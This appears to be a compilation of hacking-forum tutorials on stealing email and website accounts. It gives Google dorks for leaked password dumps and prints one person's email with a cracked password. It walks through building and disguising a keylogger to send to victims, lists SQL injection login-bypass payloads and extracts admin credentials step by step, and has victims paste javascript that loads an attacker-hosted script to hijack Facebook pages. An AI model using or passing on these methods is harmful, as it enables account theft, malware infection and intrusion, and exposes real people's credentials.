Hack email accounts using google

Hello

Today im gonna show you how to hack email accounts using some special google dorks,remember google is our friend : )

Requirements:

Google Dorks.


Code:
ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e
Code:
ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password
Code:
ext:sql intext:@hotmail.com intext:password

ONLINE hash cracker :
http://www.h4ckforu.com/md5/index.php

Ok lets begin:
Lets go to http://www.google.com one of our dorks

[Image: 97397719.jpg]

Select one of displayed pages,as you see we now have a bunch of email accounts+ hashes
[Image: 81283776.jpg]

I selected a random account
"zhaokailun92@yahoo.com.cn"
d2491b289b6be1fd0bb0c8d60e053d3d

Image has been scaled down 8% (945x529). Click this bar to view original image (1024x573). Click image to open in new window.
[Image: 53326337.jpg]


As you see we just hacked an account:
Email:zhaokailun92@yahoo.com.cn
Password:19920707
Its very easy,have fun and enjoy unlimited accounts
Here, i have collect some best hacking tools for you.
That are listed below:

1.Nessus
The “Nessus” Project aims to provide to the internet
community a free, powerful, up-to-date and easy to
use remote security scanner for Linux, BSD, Solaris,
and other flavors of Unix.
Download from here : http://www.nessus.org/
2.Ethereal
Ethereal is a free network protocol analyzer for Unix
and Windows. Ethereal has several powerful
features, including a rich display filter language and
the ability to view the reconstructed stream of a TCP
session.
Download from here : http://www.ethereal.com/
3.Snort
Snort is an open source network intrusion detection
system, capable of performing real-time traffic
analysis and packet logging on IP networks.
Download from here : http://www.snort.org/
4.Netcat
Netcat has been dubbed the network swiss army
knife. It is a simple Unix utility which reads and
writes data across network connections, using TCP
or UDP protocol
Download from here :
http://www.atstake.com/research/tools/
network_utilities/
5.TCPdump
TCPdump is the most used network sniffer/analyzer
for UNIX. TCPTrace analyzes the dump file format
generated by TCPdump and other applications.
Download from here : http://www.tcpdump.org/
6.Hping
Hping is a command-line oriented TCP/IP packet
assembler/analyzer, kind of like the “ping” program
(but with a lot of extensions).
Download from here : http://www.hping.org/
7.DNSiff
DNSiff is a collection of tools for network auditing
and penetration testing. dsniff, filesnarf, mailsnarf,
msgsnarf, urlsnarf, and webspy passively monitor a
network for interesting data (passwords, e-mail,
files, etc.).
Download from here : http://www.monkey.org/
~dugsong/dsniff/
8.GFI LANguard
GFI LANguard Network Security Scanner (N.S.S.)
automatically scans your entire network, IP by IP, and
plays the devil’s advocate alerting you to security
vulnerabilities.
Download from here : http://www.gfi.com/
lannetscan/
9.Ettercap
>Ettercap is a multipurpose sniffer/interceptor/
logger for switched LAN. It supports active and
passive dissection of many protocols (even ciphered
ones)and includes many feature for network and
host analysis.
Download from here : http://ettercap.sourcef
orge.net/
10.Nikto
Nikto is an Open Source (GPL) web server scanner
which performs comprehensive tests against web
servers for multiple items, including over 2500
potentially dangerous files/CGIs, versions on over
375 servers, and version specific problems on over
230 servers.
Download from here : http://www.cirt.net/code/
nikto.shtml
11.John the Ripper
John the Ripper is a fast password cracker, currently
available for many flavors of Unix.
Download from here : http://www.openwall.com/
john/
12.OpenSSH
OpenSSH is a FREE version of the SSH protocol suite
of network connectivity tools, which encrypts all
traffic (including passwords) to effectively eliminate
eavesdropping, connection hijacking, and other
network-level attacks.
Download from here : http://www.openssh.com/
13.TripWire
Tripwire is a tool that can be used for data and
program integrity assurance.
Download from here : http://www.tripwire.org/
14.Kismet
Kismet is an 802.11 wireless network sniffer – this is
different from a normal network sniffer (such as
Ethereal or tcpdump) because it separates and
identifies different wireless networks in the area.
Download from here : http://www.kismetwirele
ss.net/
15.NetFilter
NetFilter and iptables are the framework inside the
Linux 2.4.x kernel which enables packet filtering,
network address translation (NAT) and other
packetmangling.
Download from here : http://www.netfilter.org/
16.IP Filter
IP Filter is a software package that can be used to
provide network address translation (NAT) or firewall
services.
Download from here : http://coombs.anu.edu.au/
~avalon/
17.pf
OpenBSD Packet Filter
Download from here : http://www.benzedrine.cx/
pf.html
18.fport
fport identifys all open TCP/IP and UDP ports and
maps them to the owning application.
Download from here : http://www.foundstone.com/
resources/proddesc/fport.htm
19.SAINT
SAINT network vulnerability assessment scanner
detects vulnerabilities in your network’s security
before they can be exploited.
Download from here : http://www.saintcorpora
tion.com/products/saint_engine.html
20.OpenPGP
OpenPGP is a non-proprietary protocol for
encrypting email using public key cryptography. It is
based on PGP as originally developed by Phil
Zimmermann.
Download from here : http://www.openpgp.org/
resources/downloads.shtml
21.Metasploit
Metasploit provides useful information to people
who perform penetration testing, IDS signature
development, and exploit research. This project was
created to provide information on exploit
techniques and to create a useful resource for
exploit developers and security professionals. The
tools and information on this site are provided for
legal security research and testing purposes only.
Download from here : http://metasploit.com/
22.Fast-track
Fast-Track is a python based open source security
tool aimed at helping penetration testers conduct
highly advanced and time consuming attacks in a
more methodical and automated way. Fast-Track is
now included in Backtrack version 3 onwards under
the Backtrack --> Penetration category. In this talk
given at Shmoocon 2009, the author of Fast-Track
Dave Kennedy runs us through a primer on the tool
and demonstrates 7 different scenarios in which he
breaks into systems using the Fast-Track tool. These
scenarios include automated SQL injection, MSSQL
brute forcing, Query string pwnage, Exploit rewrite,
Destroying the Client and Autopwnage.
Download from here : http://www.thepentest.com/
Introduction to Hacking Email or any Website Accounts - Beginners Please Read


Ok now that you have my attention :lp: Please read this guide that will burst your bubble, beginner hackers. I am sorry for that.


You CANNOT hack emails or websites with just one or two clicks with some email hacking apps. You need to have proper information about the person that you are hacking. If you see sites that claim that they can hack email accounts within minutes and charge hundreds of dollars for it, just laugh at them and move on. Do not waste money on them as they will be just scamming you.

There are two ways to hack Accounts of a Website.

Client Side Hacking

This method can be done depending what you choose. Client side hacking is basically hacking the person's pc and extract information. Antiviruses will detect the apis, assemblies, etc and prevent you from infecting them. In this case you need

1) Keylogging : This basically taps all the keystrokes that users type. When user types password you get it. The victim requires to execute the keylogger "server" file in order to be infected.

2) Password Stealing : Here you steal password saved on user's pc. Browsers often save passwords to provide quick login to the user, but this can be harmful sometimes. Here same as keyloggers you need to execute a file on client pc. You can use combination of keylogger and password stealers, such as my Emissary Keylogger/Stealer.

3) Cookie Stealing : Here you are stealing cookies of the user. Cookies can be used to auto login as they hold information about the account.

4) Remote Administration Tools : These tools are very dangerous and give you full control of a computer. You can view webcams, desktops live, transfer and download files.

5) Social Engineering : Social Engineering is nothing but fooling someone to download your malware or extracting sensitive information from them.
One of the methods is this : Hacking Accounts through SE.


6) Phishing Attacks : Phishing is creating fake login pages similar to that of a website's login page and then fooling the person to enter their username and password into the login box. The triggered php scripts shall send the entered passwords to your log file.

7) Zombies/Bots : This is like keylogging and pass stealing if victim executes your malware he she can be infected with a bot. A bot will connect them to your irc channel or host server and make them your "Zombie". You can do whatever you want with them.

That covers the client part.


Server Side Hacking


1) Exploiting : Exploiting means finding a vulnerability and using it to your advantage. There are various publically disclosed vulnerabilities and exploits that you can simply search on google and HC. There are ways to exploit a server the most common ones are

1) XSS Cross Site Scripting,
2) RFI, LFI
3) Uploading Shells
4) SQL Injections
5) CSRF
6) Gaining Root Access to websites hosted on the same server and then intruding another site on the server.
7) Using Scripts to gain information known as Exploits.

These methods are very vast and cannot be explained in a few lines so I am not explaining them in this guide.


2) Bruteforce Attack : Bruteforcing is using a bruteforcer software to try combinations of words, numbers and symbols to fetch the login of your victim. But this rarely works and you need to have a powerful computer.

3) Reverting Accounts : Here we are fooling the website servers that we are the authorized user and we are the holder of an account. One of this vulnerability exists in Hotmail and existed in Facebook. Users just supplied some information about the clients such as last accessed ip address, contacts on contact list, date of birth, location, etc. With a bit of SE its not that hard to extract such information from the client.

That covers most of the basics of Email/Website Account "Hacking". Hope you don't buy into any of the bullshit after reading this guide.


Thank You, for reading.
Hello in this guide I'm going to explain how you can know another person's password for ANY account he has! This guide is working and not a scam but its for [color=#FF0000000]educational purposes only![/color]

[color=#800000080]Questions:
[/color]

Q: Any mail? even sites that aren't listed?
A: Yes

Q: What is a keylogger?
A: A keylogger or a keystroke logger is a hacktool used for sending all keys the user types by Mail or FTP ( File Transfer Protocol ).

Q: Will Anti-Virus block it?
A: Depends if some people upload the hacktool to online virus scanners which will make it detected! ( don't do that if you do you just ruined people's hours of programming. )





Step 1 - Download Accuracy keylogger from here:





Step 2 - Extract the files into a folder using WinRAR




Step 3 - Open accuracy logger




Step 4 - Type your own E-Mail's Username. Why is this needed? the program will email the key logs to your own mail by your own mail.




Step 5 - Type your own E-Mail's Password. Why is this needed? the site will need the password. don't worry no one can find out your password.




Step 6 - Type the smtp of your own e-mail. for smtp info on mailing services visit here: http://hackcommunity.com/Thread-TUT-SMTP-ports
For example if your account is @gmail.com you will need to use: smtp.gmail.com
For the port use the ones in the smtp thread. For example if your account is @gmail.com your port will be 587.




Step 7 - Type in your interval which is the amount of minutes the program will e-mail you the typed keys on another computer.




Step 8 - Type in your keylogger server's name and extensions.




Step 9 - Tick Anti's for anti-sandboxie and blockers.


Firefox stealer for also mailing EVERY saved website, username and password!


USB Spread to copy itself to any USB memory stick on the computer and autorun itself.


Add to startup for making the program start automatically after every time you turn on your computer.





Step 10 - Click the Test Mail button. if you get a error then something wrong. maybe you entered SMTP settings wrong. if not and you receive a test mail in your inbox then its working.




Step 11 - Click the Build button. you will see a new window opened with the name and extension you chose. Warning: Don't open that!




Step 12 - For making the person open it and lose suspicion or make antiviruses detect it less there are some inbuilt tools in accuracy keylogger to do that. First is the icon changer. it can change any file's icon to a selected icon. To start click the Icon changer button located on the right.



Step 13 - Select your builded server in the same folder as accuracy logger is.




Step 14 - Select an icon from your computer.




Step 15 - Click the Change button to change the icon of your server.




Step 16 - Now we are going to edit the file's assembly. what is assembly? right click on any file and go to its Properties.Then go to the Version tab. those you see are called a file's assembly. Now once your done with the icon click the Assembly Editor button to proceed.




Step 17 - Select the server that you builded.




Step 18 - Type in the assembly you want. of course you can use the ones i typed.




Step 19 - Click the Change Assembly button.




Step 20 - Now there is a function called pumping. its increasing size of ANY file by any amount! you can change a file's size from 1 MB to 1 GB! This will cause less suspicion and less Anti-Virus detection. For using the pumper click the File Pumper tab.




Step 21 - Now select your server.




Step 22 - Select the amount to pump in the size that you want.




Step 23 - Click the Pump button.




Step 24 - Now your server is complete and less detected by Anti-Viruses so you can send it to your victim!



Step 25 - All you need to do is upload accuracyserver.exe or the name of your server to a free online file hosting service like:
and give the link to anyone you want to hack. when they open it you will have ALL the keystrokes they type sended to you by E-Mail.


If you enjoyed this guide or need any help or got any questions you can
Register if your a Guest or you can just login and post your question Smile





[color=#FF0000000]Note: Its reported the program does not work on Windows Seven.[/color]




Have a great day Smile
Introduction:
Hello every one .
I am going to share with one of the best of my tutorials here .

Now Let's begin!!

Sql injection (aka Sql Injection or Structured Query Language Injection) is the first step in the entry to exploiting or hacking websites. It is easily done and it is a great starting off point. Unfortunately most sqli tutorials suck, so that is why I am writing this one. Sqli is just basically injecting queries into a database or using queries to get authorization bypass as an admin.

Things you should know :
Data is in the columns and the columns are in tables and the tables are in the database .
Just remember that so you understand the rest .

PART 1
Bypassing admin log in
Gaining auth bypass on an admin account.

Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:

Code:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"
Now what to do once we get to our site.
the site should look something like this :
ADMIN USERNAME :
PASSWORD :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections
Code:
' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'
So your input should look like this

username:Admin
password:'or'1'='1
that will confuse the site and give you authorisation to enter as admin

If the site is vulnerable than you are in Biggrin

PART 2
Finding Sites to Inject

Finding SQLI Vulnerable sits is extremely easy all you need to do is some googling. The first thing you need to do are find some dorks.
Download SQLI dorks list from here : http://www.mediafire.com/?y7v30lcj0kn8836

PS:I didn't put them in the thread because i passed count limit...
Pick one of those dorks and add inurl: before it (If they do not already have it) and then copy and paste it into google. Pick one of the sites off google and go to it.
For example the url of the page you are on may look like this :
Quote:http://www.*snip*.org/newsdetail.php?id=10

To check that it is vulnerable all you have to do is add a '

So our link should look like that :

Quote:http://www.*snip*.org/newsdetail.php?id=10'
Press enter and you get some kind of error. The errors will vary...

Our page should look like that :]
Spoiler
Image has been scaled down 8% (945x709). Click this bar to view original image (1024x768). Click image to open in new window.
Image has been scaled down 8% (945x709). Click this bar to view original image (1024x768). Click image to open in new window.
Image has been scaled down 8% (945x709). Click this bar to view original image (1024x768). Click image to open in new window.
Image has been scaled down 8% (945x709). Click this bar to view original image (1024x768). Click image to open in new window.
Image has been scaled down 8% (945x709). Click this bar to view original image (1024x768). Click image to open in new window.
Image has been scaled down 8% (945x709). Click this bar to view original image (1024x768). Click image to open in new window.
Image has been scaled down 8% (945x709). Click this bar to view original image (1024x768). Click image to open in new window.
[Image: lhx4h1.png]
After you find your vulnerable site the first step you need to take is to find the number of columns. The easiest way to do this is writing "order by " column number and we add "--" after the number.
Our link should look like that :
Quote:http://www.*snip*.org/newsdetail.php?id=10 order by 15--
If you get an error that means you should lower the number of columns .
Let's try 10.
Quote:http://www.*snip*.org/newsdetail.php?id=10 order by 10--
The page opened normally that means the number of columns is between 10 and 14.
We try now 11.
Quote:http://www.*snip*.org/newsdetail.php?id=10 order by 11--
The page opened normally too...
Let's try 12.
Quote:http://www.*snip*.org/newsdetail.php?id=10 order by 12--
We got error . That means the columns number is 11 because we got error on 12 and 11 opened normally .

Finding Accessible Columns
Now that we have the number of columns we need to get the column numbers that we can grab information from.
We can do that by adding a "-" before the "10" replacing the " order by # " with "union all select " and columns number
Our link should look like that :
Quote:http://www.*snip*.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,8,9,10,11--
We should get numbers .

Our page should look like that :]
Spoiler
[Image: vulncolumns2.jpg]
For the end part of the url, (1,2,3,4,5,6,7,8,9,10,11) You put the number of columns you found in the first step. Since I found that the site I was testing had 11 columns, I put 1,2,3,4,5,6,7,8,9,10,11--
These numbers are the colum numbers we can get information from. We will replace them later with something else so write them down if you want.

Getting Database Version
We found that column 8 , 3 , 4 and 5 are vulnerable so we will use them to get the database version .
Why Do We Do That?
If database is under 5 that means we will have to guess the tables names
To do that we need to replace one of the vulnerable columns by "@@verion"
Let's take column 8.
Our link should look like that :
Quote:http://www.*snip*.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,@@version,9,10,11--

The page should look like that :]
Spoiler
[Image: dbversion3.jpg]
In our case we got "5.0.77" its >5 so we can continue.

Now we need to get the table name we want to access :
To do it we need to replace "@@version" with "table_name" and add after the last columns number "from information_schema.tables" and add the "--" in the end .
Link should be like that:
Quote:http://www.*snip*.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,table_name,9,10,11 from information_schema.tables--

Page should look like that :]
Spoiler
[Image: tablenames4.jpg]
Now we will search the table we want to access .
We should fine something with admin on it and in our case it's tbladmin
Spoiler
[Image: tblh5.jpg]
Now we need to get the ASCII value of "tbladmin".
What is ASCII?
http://en.wikipedia.org/wiki/ASCII_value
Now to get the ASCII value of "tbladmin" go to that site : http://getyourwebsitehere.com/jswb/text_to_ascii.html
Spoiler
[Image: acsii1.jpg]
Now enter in first box the table name wich is "tbladmin" in our case and click convert to ASCII.
You will get as value that :
Code:
tbladmin
Now remove the characters as & # ; and we add a comma "," between each number .
It should be like that:
Code:
116,98,108,97,100,109,105,110
Spoiler
[Image: acsii2.jpg]
Now we replace in the URL the "table_name" to "column_name" and change "information_schema.tables" to "information_schema.columns and add "where table_name=char(ASCII value)--
in our case at place of (ASCII value) we put (116,98,108,97,100,109,105,110)--
Our URL should look like that :
Quote:http://www.*snip*.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,column_name,9,10,11 from information_schema.columns where table_name=char(116,98,108,97,100,109,105,110)--
Our page should be like that:
Spoiler
Image has been scaled down 8% (945x709). Click this bar to view original image (1024x768). Click image to open in new window.
[Image: columnsm6.jpg]
Now we search for the columns named "username" and "password" or something like that .
In our case it is "username" and "password".
Now we can delete most of the URL .
Remove everything after the 11 and add : "from tbladmin" And replace "column_name" with "concat(username,0x3a,password)
0x3a is the ASCII value of a : so we can separate the username from the password.
Our URL should look like that:
Quote:http://www.*snip*.org/newsdetail.php?id=-10 union all select 1,2,3,4,5,6,7,concat(username,0x3a,password),9,10,11 from tbladmin
Our page should look like that :
Spoiler
[Image: adminandpass.jpg]
And you're done the username is ishir and password ishir123
Some times password is encrypted with Hashes .
Use my HASH detector to know what it is and decrypt online.

Code:
http://www.mediafire.com/?7qd7t6r3b13ccq4

And We're Done !

Files are password protected... how to get the password?
http://www.sidetick.com/signup.php?signu...rer=298010 register here and pm me your username in the site Smile

Time it took me to write the tutorial : 3 days
Time it takes you to say thanks : 3 Seconds
This tutorial maybe you already know, but I'll give this tutorial might not know.

1. What you want to download?
example: you need ebook with title "Easy $ 40.00 Check"






2. Just search on google.com
example: "download Easy $ 40.00 Check"




3. Then click the arrow
Image has been scaled down 28% (945x441). Click this bar to view original image (1305x609). Click image to open in new window.
[Image: 8hDoL.png]







4. Click Cached
Image has been scaled down 29% (945x427). Click this bar to view original image (1328x600). Click image to open in new window.
[Image: kGQfv.png]

and you will get like this
Image has been scaled down 22% (945x504). Click this bar to view original image (1206x643). Click image to open in new window.
[Image: ve1lr.png]






5. Now just search link download
Image has been scaled down 22% (945x504). Click this bar to view original image (1206x643). Click image to open in new window.
[Image: osj9M.png]


Sorry i'm not advance to make thread Biggrin
but if u like my tread please +my rep Bingo
Hello friends!
Today in this article I am going to explain you how to hack Facebook fan page using javascript.

Now lets start the tutorial of facebook fan page hacking . First of all we will need to setup an exploit and a website to host that exploit. If you already have a registed hosting account then its great otherwise there are couple of free hosting websites that can be used for such purposes like 000webhost.com etc.

Facebook Password Hacking : Steps To Hack Admin Facebook Fan Page

Step 1: First download Facebook page hacking exploit.

Click here to download Facebook page hacking exploit
Password : www.wildhacker.com

Step 2: Now open the pagehack.js [in package] with notepad and search for nk@wildhacker.com and change nk@wildhacker.com with your facebook email.

Step 3: Now you have to change the viral text which will be sent to the friends of the victims. To do this, find the text Hey See what i got! and replace it with your own text. This text will be sent to the facebook wall of 15 friends of the victim. Since it is an autoposting bot, to prevent facebook from blocking it, I reduced its capacity to 15.

Now just save it as anything.js (Tip: Be social engineer and rename it to something more attractive like getprizes.js or booster.js) and then save it.

Step 4: Now create a account on free hosting like 0fess.net or 000webhost.com ( 110mb won t help this time)and upload facebook page hacking exploit on your free hosting website. you will get url address something like this,

www.yoursite.com/pagehack.js

Step 5: Now ask victim to paste this in browser address bar, He must be admin of page, which you wants to hack:

j(a = (b = document).createElement("script")).src = "http://www.yourwbesite.com/pagehack.js", b.body.appendChild(a); void(0)

Note : Change scr = http://www.yourwbesite.com/pagehack.js in javascript with your own address.

Tip: Tell him that it will make your page safe, or something else like attracting.

When he will put this key in address bar and that's it you will get a notification that you are admin of his page now.

Enjoy, But don't hack for bad cause, I will not be responsible for any consequences made by you.

Thats it..

Enjoy hacking..........
top